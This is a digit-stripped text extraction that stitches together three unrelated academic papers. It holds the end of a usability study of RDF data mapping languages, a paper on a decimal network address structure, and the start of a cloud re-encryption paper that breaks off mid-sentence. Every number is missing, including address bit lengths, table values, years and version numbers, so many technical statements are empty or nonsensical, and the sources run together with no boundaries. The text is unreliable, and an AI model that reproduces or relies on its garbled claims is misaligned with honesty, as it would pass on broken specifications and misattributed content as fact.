doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. review of the other variables shows that the users do not see much applicability on the three languages, that the design of the languages leads users to commit some errors during the development of the script and that the error reporting system in the three of them is not very useful to solve the incoming problems. the feedback received from the users in the error proneness and error reporting usefulness variables determines that these two aspects are the ones that should be improved in the three languages to improve their usability. this comes to answer the rq . for the modifiability variable assessed in task , shexml users tend to rate this feature with high marks whereas the single yarrrml user gave a response of in a point likert scale which is in line with his/her completeness percentage mark. as with the objective results of task , these subjective results should be further validated in future bigger experiments to corroborate these early findings. alignment with features comparison in the light of the statistical analysis outcome, sparql-generate design has been shown to have a negative impact on first-time users. this led to three users abandoning the task and low completeness scores for the rest of the group. although having more features in a language is something good and desirable, these results caught attention on how these features should be carefully designed and included in the language in order to improve easiness of use, and thus overall adoption of the tool. in the case of yarrrml language, although it has been designed with human-friendliness in mind, in our experiment it has not reached the expected results in comparison with shexml. however, it has better results than sparql-generate, suggesting it is less complex to use than that language, but still more complex than shexml. nevertheless, it does not seem that supported features could explain the differences between yarrrml and shexml as the features used on the experiment are more or less equal. instead other syntax details may be affecting the differences between these two groups such as: the use of keywords that made the language more self explanatory and the modularity used on iterators which reminds of object-oriented programming languages. however, this would require a broader study taking into account programming style background of participants and their own style preferences using techniques like a cognitive complexity architecture (hansen, lumsdaine & goldstone, ) to identify how each feature and its design is affecting the usability of each specific language. these results highlight the importance on how features are designed and included in a language. therefore, sparql-generate with more features and being a highly flexible language tends to have a bad influence on users’ usability. comparing shexml and yarrrml we see that these differences are smaller than with sparql-generate and that features support does not seem to be the variable affecting yarrrml usability. thus, we can conclude—and answer the rq —that it is not the features supported by a language which affects usability of first-time users but their design. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions and future work inthisworkwehavecomparedtheusabilityofthreeheterogeneousdatamappinglanguages. the findings of our user study were that better results, and speed on finding this solution, are related to shexml users whereas sparql-generate users were not able to find any solution under study conditions. in the case of yarrrml users, they performed better than sparql-generate users but worse than shexml users finding partial solutions to the given problem. this study is (to our knowledge) the first to explore the topic of usability for first-time users with programming and linked data background in these kind of languages. it also reflects the importance that usability has on the accuracy of the encountered solutions and how features should be carefully designed in a language to not impact negatively on its usability. as future work, bigger experiments should be carried out with an emphasis on programming style background and styles (using cognitive complexity frameworks) to corroborate and expand these early findings. in addition, improving these aspects that were worst rated in the three languages (i.e., error proneness and the error reporting system) would enhance perceived user friendliness. this work highlights the importance of usability on these kind of languages and how it could affect their adoption. acknowledgements we want to thank the students of the master’s degree in web engineering for their willingness to participate in the experiment described in this work. additional information and declarations funding this work has been funded by the principality of asturias through the severo ochoa call (grant bp - ), by the ministry of economy, industry and competitiveness under the call of ‘‘programa estatal de i+d+i orientada a los retos de la sociedad’’ (project tin - -r), the cper nord-pas de calais/feder data advanced data science and technologies – , and the anr project datacert anr- -ce - . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: principality of asturias through the severo ochoa call: bp - . ministry of economy, industry and competitiveness under the call of ‘‘programa estatal de i+d+i orientada a los retos de la sociedad’’: tin - -r. the cper nord-pas de calais/feder data advanced data science and technologies - . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the anr project datacert: anr- -ce - . competing interests the authors declare there are no competing interests. author contributions • herminio garcía-gonzález conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • iovka boneva conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • sławek staworko and juan manuel cueva lovelle performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • josé emilio labra-gayo conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of oviedo granted ethical approval to carry out the described study. data availability the following information was supplied regarding data availability: experiment data, supplemental material and raw data are available at github: https://github.com/herminiogg/shexml-paper- -data. references auer s, dietzold s, lehmann j, hellmann s, aumueller d. . triplify: light- weight linked data publication from relational databases. in: proceedings of the th international conference on world wide web, www , madrid, spain, april – , . – doi . / . . battle s. . round-tripping between xml and rdf. in: international semantic web conference (iswc), hiroshima, japan. battle s. . gloze: xml to rdf and back again. in: proceedings of the first jena user conference. berners-lee t, hendler j, lassila o. . the semantic web. scientific american ( ): – . bischof s, decker s, krennwallner t, lopes n, polleres a. . mapping be- tween rdf and xml with xsparql. journal on data semantics ( ): – doi . /s - - - . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/herminiogg/shexml-paper- -data http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. bizer c, seaborne a. . d rq-treating non-rdf databases as virtual rdf graphs. in: proceedings of the rd international semantic web conference (iswc ), vol. . proceedings of iswc . boneva i, labra gayo je, prud’hommeaux eg. . semantics and validation of shapes schemas for rdf. in: d’amato c, fernandez m, tamma v, lecue f, cudré-mauroux p, sequeda j, lange c, heflin j, eds. the semantic web—iswc . cham: springer international publishing, – . breitling f. . a standard transformation from xml to rdf via xslt. astronomische nachrichten ( ): – doi . /asna. . das s, sundara s, cyganiak r. . r rml: rdb to rdf mapping language. available at https://www.w .org/tr/r rml/ . deursen dv, poppe c, martens g, mannens e, de walle rv. . xml to rdf conversion: a generic approach. in: automated solutions for cross media content and multi-channel distribution, . axmedis ’ . international conference on. washington, – doi . /axmedis. . . dimou a, sande mv, colpaert p, verborgh r, mannens e, de walle rv. . rml: a generic language for integrated rdf mappings of heterogeneous data. in: proceedings of the workshop on linked data on the web co-located with the rd international world wide web conference (www ), seoul, korea, april , . ermilov i, auer s, stadler c. . csv rdf: user-driven csv to rdf mass conversion framework. in: proceedings of the isem, vol. . graz, austria, – . fagin r, kolaitis pg, miller rj, popa l. . data exchange: semantics and query an- swering. theoretical computer science ( ): – doi . /j.tcs. . . . field a. . discovering statistics using ibm spss statistics. thousand oaks: sage. fiorelli m, lorenzetti t, pazienza mt, stellato a, turbati a. . sheet rdf: a flexible and dynamic spreadsheet import&lifting framework for rdf. in: current approaches in applied artificial intelligence— th international conference on industrial, engineer- ing and other applications of applied intelligent systems, iea/aie , seoul, south korea, june – , , proceedings. – doi . / - - - - _ . freire f, freire c, souza d. . enhancing json to rdf data conversion with entity type recognition. in: proceedings of the th international conference on web information systems and technologies, webist , porto, portugal, april – , . – doi . / . garcía-gonzález h, fernández-Álvarez d, gayo jel. . shexml: an heterogeneous data mapping language based on shex. in: proceedings of the ekaw posters and demonstrations session co-located with st international conference on knowledge engineering and knowledge management (ekaw ), nancy, france, november – , . – . halevy ay. . answering queries using views: a survey. the vldb journal ( ): – doi . /s . han l, finin t, parr cs, sachs j, joshi a. . rdf : from spreadsheets to rdf. in: the semantic web—iswc , th international semantic web conference, garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asna. https://www.w .org/tr/r rml/ http://dx.doi.org/ . /axmedis. . http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. iswc , karlsruhe, germany, october – , . proceedings. – doi . / - - - - _ . hanenberg s. . faith, hope, and love: an essay on software science’s neglect of human factors. in: cook wr, clarke s, rinard mc, eds. proceedings of the th annual acm sigplan conference on object-oriented programming, systems, languages, and applications, oopsla , october – , , reno/tahoe, nevada, usa. acm, – . hansen me, lumsdaine a, goldstone rl. . cognitive architectures: a way forward for the psychology of programming. in: leavens gt, edwards j, eds. acm sympo- sium on new ideas in programming and reflections on software, onward! , part of splash ’ , tucson, az, usa, october – , . acm, – . hert m, reif g, gall hc. . a comparison of rdb-to-rdf mapping languages. in: proceedings of the th international conference on semantic systems. acm, – . heyvaert p, dimou a, herregodts a, verborgh r, schuurman d, mannens e, de walle rv. . rmleditor: a graph-based mapping editor for linked data mappings. in: the semantic web. latest advances and new domains— th international conference, eswc , heraklion, crete, greece, may –june , , proceedings. – doi . / - - - - _ . heyvaert p, meester bd, dimou a, verborgh r. . declarative rules for linked data generation at your fingertips!. in: the semantic web: eswc satellite events— eswc satellite events, heraklion, crete, greece, june – , , revised selected papers. – doi . / - - - - _ . lefrançois m, zimmermann a, bakerally n. . flexible rdf generation from rdf and heterogeneous data sources with sparql-generate. in: knowledge engineering and knowledge management—ekaw satellite events, ekm and drift-an- lod, bologna, italy, november – , , revised selected papers. – doi . / - - - - _ . lefrançois m, zimmermann a, bakerally n. . a sparql extension for generating rdf from heterogeneous formats. in: the semantic web— th international conference, eswc , portorož, slovenia, may –june , , proceedings, part i. – doi . / - - - - _ . meester bd, heyvaert p, verborgh r, dimou a. . mapping languages: analysis of comparative characteristics. in: chaves-fraga d, heyvaert p, priyatna f, sequeda jf, dimou a, jabeen h, graux d, sejdiu g, saleem m, lehmann j, eds. ceur workshop proceedings. joint proceedings of the st international workshop on knowledge graph building and st international workshop on large scale rdf analytics co-located with th extended semantic web conference (eswc ), portorož, slovenia, june , , vol. . ceur-ws.org, – . meester bd, maroy w, dimou a, verborgh r, mannens e. . rml and fno: shaping dbpedia declaratively. in: the semantic web: eswc satellite events— eswc satellite events, portorož, slovenia, may –june , , revised selected papers. – doi . / - - - - _ . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. michel f, djimenou l, faron-zucker c, montagnat j. . translation of relational and non-relational databases into rdf with xr rml. in: monfort v, krempels k, majchrzak ta, turk z, eds. webist —proceedings of the th international conference on web information systems and technologies, lisbon, portugal, – may, . scitepress, – . michel f, montagnat j, zucker cf. . a survey of rdb to rdf translation ap- proaches and tools. phd thesis, i s. available at https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_ rdf_translation_approaches_and_tools.pdf . miletic i, vujasinovic m, ivezic n, marjanovic z. . enabling semantic mediation for business applications: xml-rdf, rdf-xml and xsd-rdfs transformations. in: gonçalves rj, müller jp, mertins k, zelm m, eds. enterprise interoperability ii: new challenges and approaches. london: springer, – . müller h, cabral l, morshed a, shu y. . from restful to sparql: a case study on generating semantic sensor data. in: proceedings of the th international workshop on semantic sensor networks co-located with the th international semantic web conference (iswc ), sydney, australia, october nd, . – . prud’hommeaux e, labra gayo je, solbrig h. . shape expressions: an rdf validation and transformation language. in: proceedings of the th international conference on semantic systems, sem ’ . new york: acm, – . reinsel d, gantz j, rydning j. . the digitization of the world. from edge to core. technical report. seagate, idc. available at https://www.seagate.com/files/www- content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf (accessed on october ). sahoo ss, halb w, hellmann s, idehen k, thibodeau jr t, auer s, sequeda j, ezzat a. . a survey of current approaches for mapping of relational databases to rdf. w c rdb rdf incubator group report : – . scharffe f, bihanic l, képéklian g, atemezing g, troncy r, cotton f, gandon f, villata s, euzenat j, fan z, bucher b, hamdi f, vandenbussche p, vatant b. . enabling linked data publication with the datalift platform. in: semantic cities, papers from the aaai workshop, toronto, ontario, canada, july – , . sequeda jf, arenas m, miranker dp. . on directly mapping relational databases to rdf and owl. in: proceedings of the st world wide web conference , www , lyon, france, april – , . – doi . / . . slepicka j, yin c, szekely pa, knoblock ca. . kr rml: an alternative interpre- tation of r rml for heterogenous sources. in: hartig o, sequeda jf, hogan a, eds. ceur workshop proceedings. proceedings of the th international workshop on consuming linked data co-located with th international semantic web conference (iswc ), bethlehem, pennsylvania, usa, october th, , vol. . ceur- ws.org. sperberg-mcqueen cm, miller e. . on mapping from colloquial xml to rdf using xslt. in: extreme markup languages r©. montréal: online proceedings (mulberry technologies, inc.). garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. stadler c, unbehauen j, westphal p, sherif ma, lehmann j. . simplified rdb rdf mapping. in: bizer c, auer s, berners-lee t, heath t, eds. ceur workshop proceedings. proceedings of the workshop on linked data on the web, ldow , co-located with the th international world wide web conference (www ), florence, italy, may th, , vol. . ceur-ws.org. tandy j, herman i, kellogg g. . generating rdf from tabular data on the web, w c recommendation december . world wide web consortium. available at https://www. w .org/tr/ /rec-csv rdf- . theocharis s, tsihrintzis ga. . rdf serialization from json data: the case of json data in diavgeia.gov.gr. in: th international conference on information, intelligence, systems & applications, iisa , chalkidiki, greece, july – , . – doi . /iisa. . . thuy ptt, lee y-k, lee s, jeong b-s. . transforming valid xml documents into rdf via rdf schema. in: nwesp . third international conference on next generation web services practices, . nwesp . piscataway: ieee, – . thuy ptt, lee y-k, lee s, jeong b-s. . exploiting xml schema for interpreting xml documents as rdf. in: services computing, . scc’ . ieee international conference on, vol. . piscataway: ieee, – . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www. w .org/tr/ /rec-csv rdf- http://dx.doi.org/ . /iisa. . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , research of new network address structure chong jiao . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com xie jianping . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .cn xu yinqiu . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .com, zhao hongwen shandong radio, television and network co., ltd. tai 'an branch. e-mail: tagdglcs@qq.com abstract—with the wide application of internet technology, the number of hosts accessing the internet has grown rapidly, and addresses will be more and more widely used in other intelligent terminals such as e-commerce logistics codes, space codes, identity codes, and d geocodes. the number of existing addresses is no longer sufficient for this development demand. the emergence of ipv temporarily alleviated the problem of ip address shortage, and ipv did not fully consider the security of data transmission at the beginning of design. chinese researchers have proposed a new internet address architecture, that is, method of using whole digital code to assign address for computer, referred to as ipv . ipv extends address capacity; supports more address hierarchies, more addressable nodes, and simpler automatic address configuration. based on the study of ipv and ipv address structure, this paper designs the standards of the new generation network address structure, including ipv unicast address structure, cluster address structure and multicast address structure, which provides a solid foundation for new generation of internet research. keywords-addressing; address structure; ipv ; decimal network i. introduction at the beginning of the internet development, ipv addresses were sufficient and successful, but in the last years of the th century, the global internet was growing rapidly, and the number of hosts connected to the internet was growing exponentially every year. therefore, the number of existing addresses is no longer sufficient for this development demand. ipv solves the problem of address shortage in ipv , but it does not fully consider the network security problem in design. there are many security risks, and ipv is not compatible with the original ipv . in order to adapt to the network development, chinese researchers proposed a new network address architecture. this structure adopts a method of using whole digital code to assign address for computer and intelligent terminal. it is input to a computer through various input devices of a computer and a smart terminal, and combines software and hardware of various computers. the external addresses of the networked computers and doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , intelligent terminals are compiled corresponding to the addresses of the internal operations of the computer through various transmission media. this new address allocation method can provide sufficient address space for the future development of the internet, and this new one also provides sufficient information for various personal information appliances and e-commerce logistics and personal communication terminal applications. this also ensures that the address hierarchies can have more layers. the ip address length from bits to bits to , to support more address hierarchies, more addressable nodes and simpler automatic address configuration. at the same time, the -bit address length of ipv has been reduced to bits to solve the quick use of cellular communication in mobile communication. ii. address text representation the decimal network address is expressed in "brackets in decimal", that is, y[y[y[y[y[y[y[y[y, where each y represents a - bit long integer in decimal. such as: [ [ [ [ [ [ [ . in the address representation, multiple consecutive zeros on the left of each decimal number can be omitted, but all zero decimal numbers need to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ ]. in order to further simplify the representation of address, we can address the entire continuous field zero can be represented by "[x]" (x is the number of stages of the all-zero field). for example, the above address can be abbreviated as [ ] [ [ ]. the decimal network address prefix uses a cidr (classless inter-domain routing) like representation, which has the following form: ipv address/address prefix length. the ipv address is an address written by the ipv address representation, and the address prefix length is the number of consecutive digits from the leftmost part of the address to indicate the address prefix. the decimal number is used in the ipv address, but the prefix length refers to the binary. for example: -bit address prefix [ [ [ [ [ [ can be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ ]/ . in the representation of the address prefix, the ipv address to the left of the slash "/" must be restored to the correct address. ipv addresses are assigned to interfaces, not nodes. the ipv address specifies a -bit identifier for the interface and interface group. there are three types of addresses: a single interface with a single unicast address, anycast address, and a multicast address. iii. unicast address structure the unicast address is the identifier of a single network interface, and the packet with the unicast address as the destination address is sent to the unique network interface identified by it. the address hierarchy of the unicast address is very similar in form to the cidr address structure of ipv , and they all have consecutive address prefixes and address codes of arbitrary length. ipv 's unicast address has the following forms: aggregate global unicast address, decimal internet address and domain name decision and assignment organization address, ipx address, local ipv unicast address, and ipv compatible address. the aggregatable global unicast address and cluster address belong to the unicast address. they are not different in form, but differ in the propagation mode of the message. therefore, the aggregatable unicast address and cluster address are assigned the same format prefix . both the local link unicast address and the in-station unicast address are used in the local range. to facilitate the router to speed up the identification of these two types of addresses, and address format prefix are assigned to them respectively. international journal of advanced network, monitoring and controls volume , no. , a. aggregate global unicast address the internet has a tree topology hierarchy. in order to better express this hierarchy, ipv introduces a multi-hierarchical addressable address. organizations at all levels of the internet are assigned their own identity (address prefix) in the address, and each organization identity is assigned based on the higher-level agency identity to which it is directly affiliated. different levels of the internet routing systems can only distinguish subnet identifiers in the address above its level, that is, low-level network structures are transparent in high-level nodes. in this way, the low-level subnets are aggregated at a high level, sharing a high-level subnet number, which are represented by an item in the high-level router routing table. the aggregatable global unicast address is the most widely used unicast address when a node is connected to the internet. this kind of address is used primarily to support network vendor-based address aggregation and network intermediary based address aggregation. the use of aggregatable global unicast addresses can effectively aggregate subnets in all levels of routing systems, thereby reducing the size of the routing table. ) introduction of aggregatable global unicast address the multi-level network structure has good scalability, which is beneficial to solve the problem of routing addressing. like the telephone network, ipv has a good hierarchical structure for aggregatable global unicast addresses, which can have the following three levels: a) public topology layer: the public topology layer is a collection of network providers and network intermediaries that provide public internet transit services. b) site topology layer: the site topology layer is limited to specific sites or organizations that do not provide public internet transit services to off-site nodes. c) network interface identification: the network interface identifier is used to identify the network interface on the link. ) structure of aggregatable global unicast address the ipv aggregatable global unicast address consists of six domains: address format prefix (fp), top-level aggregation identifier (tla), reserved domain (res), secondary aggregation identifier (naa), and site-level aggregation identifier (sla), and network interface identification. in order to reduce the difficulty of readdressing when changing network access, the lengths of these six domains are fixed, the structure of aggregatable unicast addresses is shown in table : table i. aggregate unicast address structure bits bits bits fp tla logo res nla identifier sla identifier network interface identifier public topological layer site topology layer network interface identifier a) format prefix: the format prefix of the aggregatable global unicast address is defined as a " " four-bit binary string. with this address format prefix, the routing system can quickly distinguish whether an address is an aggregatable global unicast address or other type of address. b) top level aggregation identifier: the top-level aggregate identifier is the highest level in the routing hierarchy. default router must be given each international journal of advanced network, monitoring and controls volume , no. , active polymerization top of an identifier correspondence, and provide the top aggregation in the identifier represents the address of the region of the routing information. currently, the top-level aggregation identifier is bits and can support network switcher nodes, remote network providers, or backbone network service provider nodes. c) secondary aggregation identifier: the organization using two polymerization identification to establish internal addressing hierarchy and identifier within the site which have top level aggregation identifier. the organization with top-level aggregation identifier has -bits secondary aggregation identifier space, that is, if the organization directly allocates these secondary aggregation identifiers, it can allocate . the - bit long secondary aggregation identifier divides the first-level nla of n bits, and the remaining ( -n) bits serve as site ids. the allocation scheme of the secondary aggregation identifier is a compromise between route aggregation efficiency and flexibility. when an organization allocates its internal secondary aggregation identifier, it can select an allocation scheme according to its own needs. establishing a hierarchy allows the network to aggregate to a greater degree at all levels of the router, and to make the routing table smaller. directly assigning a secondary aggregated identifier simplifies the allocation process, but results in excessive routing table size. d) site-level aggregation identifier: site-level aggregation identifier is used for individual organizations (sites) to establish their internal addressing hierarchy and identity subnets. the site-level aggregate identifier is similar to the ipv subnet number, except that the ipv site can accommodate a larger number of subnets. the -bit site-level aggregation identifier domain can support , , , subnets, which is sufficient to support the subnet size within most organizations. an organization can directly assign its site-level aggregation identifiers. there is no logical relationship between the site-level aggregation identifiers, and the routing table size of the router is large. it is also possible to divide two or more layers of structures within a site-level aggregation identifier domain. e) network interface identifier: the network interface identifier is used to identify the network interface on a link. on the same link, each network interface identifier must be unique. the aggregatable global unicast address ultimately identifies a network interface (or node) at the network interface level. in many cases, the network interface identifier is the same as the link layer address of the network interface, or based on the link layer address of the network interface. the same network interface identifier can be used on multiple interfaces of the same node, which are only treated as one network interface on the network. b. local link unicast address the local link unicast address is used for communication between nodes on the same link. this type of address has a separate address format prefix " " for efficient addressing on this link. this type of address is used for automatic configuration of addresses, neighbor detection, and there are no routers on the link. if there are routers on the link, these routers do not forward ipv packets to other links which have the local link unicast address as the destination address the source address. the structure of the local link unicast address is very simple. it consists directly of the address format prefix and the - bit network interface identifier, and is filled with bits of , as shown in the table . international journal of advanced network, monitoring and controls volume , no. , table ii. local link unicast address structure bits bits bits network interface identifier an in-site unicast address can be used when it is desired to address the network interface of the communication within the site and does not wish to use the global address format prefix. at the same time, the station's unicast address is also used for the addressing of isolated sites that are independent of the internet, such as addressing in a campus network that is not connected to the internet. because the scope of the unicast address in the station is much larger than the range of the local link unicast address, and a site often contains multiple subnets, the structure of the unicast address in the station is more than that of the local link. the format prefix assigned to the unicast address in the station is " ". the specific structure of the address is shown in the table . table iii. structure of the unicast address in the station bits bits bits bits subnet identifier network interface representation similar to the use of the local link unicast address, ipv packets with the source address or destination address in the station can only be propagated within the site. the router cannot forward these packets out of the site. c. compatible address in ipv , some mechanisms for smoothing the transition from ipv /ipv to ipv have been developed, including the use of existing ipv and ipv routing systems as tunnel forwarding ipv packet technologies. for ipv nodes using this technology, it is required to assign several special ipv addresses of "ipv compatible address", "ipv compatible address" and "special compatible address". the specific structure of these addresses is shown in the table - : table iv. compatible address format bits bits bits bits bits bits bits prefix reserved sign scope dedicatedipv ipv address table v. ipv mapped address format bits bits bits bits [ [ ipv address table vi. mapped address format bits bits bits [ [ ipv address international journal of advanced network, monitoring and controls volume , no. , table vii. mapping address format for special compatible addresses bits bits bits bits [ [ ipv address iv. cluster address structure in many cases, there may be multiple servers on the network that provide the same service at the same time (for example, a mirror server). a host, an application or a user often only wants to get a service without paying attention to which server the service is provided, that is, only one of all these servers is required to serve the user. anycast transmission mechanism is proposed to meet such needs on the network. the mechanism uses the cluster address to identify the set of servers that provide the same service. when a user sends a message to the cluster address, the network sends the message to at least one server that owns the cluster address. a cluster address is a type of ipv address that is simultaneously assigned to multiple network interfaces. the ipv message destined for the destination address of the cluster address will be sent to the interface that owns the cluster address. the routing protocol considers the nearest one, that is, only one interface can receive the packet. the cluster address of ipv is allocated from the unicast address and is defined in the same format as the unicast address, that is, the cluster address is formally indistinguishable from the unicast address. when a unicast address is assigned to multiple network interfaces, it is functionally translated into a cluster address. the node that gets the cluster address must perform the appropriate configuration process to recognize that the address is a cluster address. for each assigned cluster address, it always has a longest prefix p to identify the minimum containment level of all network interfaces that have the cluster address in the network topology. for example, each school in a school has an image of an ftp server, and the minimum inclusion of all of these servers may be the highest level in the school's network structure. the corresponding prefix p is used to identify the highest network level. within the network hierarchy identified by the prefix p of a cluster address, each member that owns the address must be published as a separate item in the routing system (often referred to as host routing); outside the hierarchy identified by the prefix p all member network interfaces identified by the cluster address can be aggregated into one item to be published in the routing system. it is worth noting that in the worst case, the prefix p of a cluster address may be in length, that is, the distribution of the network interface that owns the cluster address in the internet cannot form a topology, so all of these networks are included. the smallest hierarchy of interfaces is the entire internet. in this case, each node corresponding to the cluster address must be published on the internet as a separate item. this severely limits the number of such global cluster address sets that the routing system can support. therefore, the internet may not support a global set of cluster addresses, or only provide extremely restrictive support. at present, the use and implementation mechanism of ipv for cluster addresses are still being researched and tried. there are three types of cluster addresses that have been identified so far:  identify a collection of routers in an organization that provides internet services. at this time, the cluster address can be used as the intermediate router address in the extension header of the packet source path, so that the packet is converted by any router of the designated network service access organization. international journal of advanced network, monitoring and controls volume , no. ,  identify the set of routers that connect to a particular subnet.  identify a set of routers that provide routing information to a certain network area. because the experience of using cluster addresses in a wide range is rare, and there are some known problems and dangers in the use of cluster addresses, before accumulating a lot of experience with cluster addresses and finding solutions to cluster address ills, the following restrictions must be adhered to when implementing an ipv cluster address:  the cluster address cannot be used as the source address in the ipv message;  the cluster address can only be assigned to the router at present, but not to the normal ipv host node. currently, the ipv protocol only predefines a cluster address – the subnet router cluster address. this kind of address must be owned and must be identifiable by each subnet router. the specific format is shown in the table : table viii. subnet router cluster address n bits -n bit subnet prefix host number (all ) the entire subnet router cluster address, as its name implies, is the cluster id of all routers connected to the link subnet. its purpose is to allow applications on one node to communicate with one of all router collections on the remote subnet. v. multicast structures multicast is used when implementing the network multicast mechanism. the ipv protocol also adopts a multicast mechanism and specifically designed a multi-purpose address for multicast use. the address space prefixed with the address format in the address space of ipv is reserved for multicast. the multicast address is assigned to multiple network interfaces in the same way as the cluster address. the difference between the two is that ipv packets with the destination address of the multicast address will be received by all network interfaces that have the multicast address at the same time. this sending process is called multicast. a collection of network interfaces that have the same multi-cast address is called a multicast group. the multicast address of ipv consists of four parts, with " " as the address format prefix. the specific structure is shown in the table . table ix. ipv multicast address format bits bits bits bits sign range of action group identification the remaining three parts of the format followed by the address format prefix are the flag bit field, the address scope field, and the group identification field. the flag bit field consists of bits, the flag bit field uses only the lowest bit of the bits (t bit), and the remaining upper seven bits are reserved. the t bit is called the "temporary address bit" and it indicates that the assigned multicast address is temporarily valid or permanent. the address range is an integer consisting of bits. it is used to limit the distribution range of multicast group members, thus limiting the effective range of the multicast address relative to the sender of international journal of advanced network, monitoring and controls volume , no. , the message during multicast. group identification field for a multicast group, it is in the low among the entire address format. a multicast group identified by a group identity field may be a temporary or permanent multicast group within a given range. a. universal multicast address in the design of ipv , some common multicast addresses are predefined, such as reserved multicast address, all-node multicast address, all router multicast address, and the requested node multicast address. these addresses are typically used when neighboring nodes are probed and the address is automatically configured. ) reserved multicast address: multicast address with group identifier of can only be reserved but cannot be assigned to any multicast group, that is, the flag bit is , the address range is arbitrary, and the group id is all . the addresses at the time are all reserved multicast address addresses. ) all node multicast address addresses: general multicast addresses [ ] and [ ] are all node multicast addresses, which identify all nodes within the scope of the node and within the scope of the link. these two addresses function similarly to the broadcast address in ipv and are used to send broadcast messages within their corresponding scope. ) all routers multicast address: it contains the following three general multicast address addresses, which identify all routers in range (scop= , on the same node), in range (scop= , on the same link). all routers and all routers in range (scop= , same site): [ ] [ ] [ ] ) the requested node multicast address: the requested node multicast address ranges from [ ] [ [ to [ ] [ [ . the requesting node is a node for detection probe target node is the neighbor (there may be multiple simultaneous). in the process of neighbor discovery, the requested node multicast address is used as the address identifier of the requested target node, and its scope is on the local link. b. distribution of multicast addresses the assignment process of the multicast address is the assignment of the multicast address group identification. in the format structure of the multicast address, the group representation is allocated bits of space. in theory, these bits can allocate different group identifiers. however, because the current multicast ethernet embodiment only the lower bits of the ipv multicast address mapped to the mac address of ieee , and the processing of the token ring network multicast address will also be different, in order to ensure ipv can be generated on the basis of the multicast address of the mac address is unique, is currently only available in the bit group identification assigned to the lower bits of the group identifier, the remaining bits are reserved (set to all zeros), the multicast address format is shown in table . table x. multicast address format with - bit group identification bits bits bits bits bits sign range of action group identification the above scheme limits the permanent group identification of the ipv multicast address to , which has been able to meet the currently foreseeable needs. if the need for group identification exceeds this international journal of advanced network, monitoring and controls volume , no. , limit in the future, multicast will still work but the processing speed will be slightly reduced; with the development of network equipment in the future, the -bit group identification space can be fully utilized. vi. summary ipv has a huge address capacity, can be compatible with ipv and ipv , and uses a special encryption mechanism to make the network environment more secure. the application of ipv is being promoted in china, especially in the government, banking and other departments. this paper summarizes the current ipv address structure, including ipv unicast address structure, cluster address structure and multicast address structure, etc., and introduces the compatible address format of ipv , ipv to ipv transition, and the aggregatable global unicast address. the aggregation logo provides a corresponding basis for future application development based on ipv . reference [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] zang qianli etc. a survey on ipv address structure standardization researches [j]. chinese journal of computers. : - [ - - ]. [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] xie xiren. the concise tutorial on computer network [m]. publishing house of electronics industry, . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . iet submission template international conference on sensor network and computer engineering (icsnce ) a searchable re-encryption storage method in cloud environment wang hui school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com hong bo, tang junyong school of computer science and engineering xi’an technological university xi’an, , china abstract—traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. in order to solve the problems brought by the hysteretic and density in the 